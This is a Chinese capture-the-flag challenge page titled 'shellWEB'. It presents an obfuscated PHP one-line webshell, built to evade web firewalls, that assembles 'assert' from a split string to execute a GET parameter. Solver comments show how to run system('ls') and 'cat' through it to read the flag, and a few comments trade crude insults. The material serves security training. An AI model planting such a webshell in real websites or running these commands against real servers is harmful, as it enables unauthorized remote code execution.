shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 3987
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
不懂就问 1月前

学习参考:https://surpsec.blog.csdn.net/article/details/136709908

回复 0

YSN97 1月前

说环境有问题的到底是有多菜。对webshell的理解比头皮屑还薄。就着还好意思说RNM退钱,你怎么不先R你自己的M呢?

回复 1
YUMEKO 1月前

6

回复 0

15614005380 1月前

环境没坏,看描述和题目名做题。

回复 0

GET-lee 1月前

简单到不敢相信

回复 0

淮南 4月前

环境打不开 退钱!!!

回复 0

淮南 4月前

环境有问题

回复 0

小白菜. 5月前

后悔做之前没看评论区,rnm,退钱

回复 0

falg 6月前

就是一般的命令执行,先拿到index.php然后后面?s=system("ls")查看flaga15808abee46a1d5.txt文件,接着?s=system("cat ./flaga15808abee46a1d5.txt")得到flag

回复 1

bt7274 8月前

assert($_GET['s'])

回复 0

04secbug 9月前

s=system('ls') s=system('cat flag')

回复 1

WriteUp

image
harry

3 金币

评分(5)

解题动态

toto 攻破了该题 11小时前
Aimerzz 攻破了该题 1天前
zhao2 攻破了该题 1天前
111jing 攻破了该题 2天前
15655459224 攻破了该题 2天前
Bojing 攻破了该题 2天前
tsz2004 攻破了该题 2天前
lazy666 攻破了该题 2天前
swind 攻破了该题 3天前
Daisys 攻破了该题 3天前
junzijie 攻破了该题 3天前
xjc7580 攻破了该题 3天前
hadewear 攻破了该题 4天前
野王哥哥抱抱我嘛 攻破了该题 4天前
xjh888 攻破了该题 4天前
2742137753 攻破了该题 4天前
deans 攻破了该题 5天前
tommyxy 攻破了该题 5天前
shandow 攻破了该题 6天前
18225355670 攻破了该题 6天前